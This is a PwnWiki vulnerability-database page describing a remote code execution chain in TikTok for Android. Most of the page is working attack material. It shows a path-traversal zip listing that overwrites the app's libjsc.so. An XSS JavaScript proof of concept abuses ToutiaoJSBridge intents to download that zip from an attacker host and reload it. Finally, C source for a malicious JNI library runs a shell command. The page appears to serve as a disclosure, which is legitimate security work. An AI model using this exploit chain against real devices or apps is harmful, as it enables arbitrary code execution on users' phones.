Loading
0

安卓版TikTok RCE漏洞/en

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

Created a zip file with a path that traverses the file name and overwrites the

/data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
email protected Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
​
7-Zip 64 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)
​
Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)
​
Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
​
--
Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930
​
   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2020-11-26 04:08:29 .....         5896         1496  ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------  ------------------------
2020-11-26 04:08:29               5896         1496  1 files

Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.

POC

document.title = "Loading..";
document.write("<h1>Loading..</h1>");
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
    window.name = "finished";
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
        "__callback_id": "0",
        "func": "preloadMiniApp",
        "__msg_type": "callback",
        "params": {
            "mini_app_url": "https://microapp/"
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://d.c/"
    })); // initialize Mini App
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
        "__callback_id": "0",
        "func": "openSchema",
        "__msg_type": "callback",
        "params": {
            "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
        },
        "JSSDK": "1",
        "namespace": "host",
        "__iframe_url": "http://iframe.attacker.com/"
    })); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
    setTimeout(function() {
        window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
            "__callback_id": "0",
            "func": "openSchema",
            "__msg_type": "callback",
            "params": {
                "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
            },
            "JSSDK": "1",
            "namespace": "host",
            "__iframe_url": "http://iframe.attacker.com/"
        })); // load the malicious library after overwrtting it.
    }, 5000);
}

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>
​
​
JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("id > /data/data/com.zhiliaoapp.musically/PoC");
    return JNI_VERSION_1_6;
}

免费、自由、人人可编辑的漏洞库--pwnwiki.com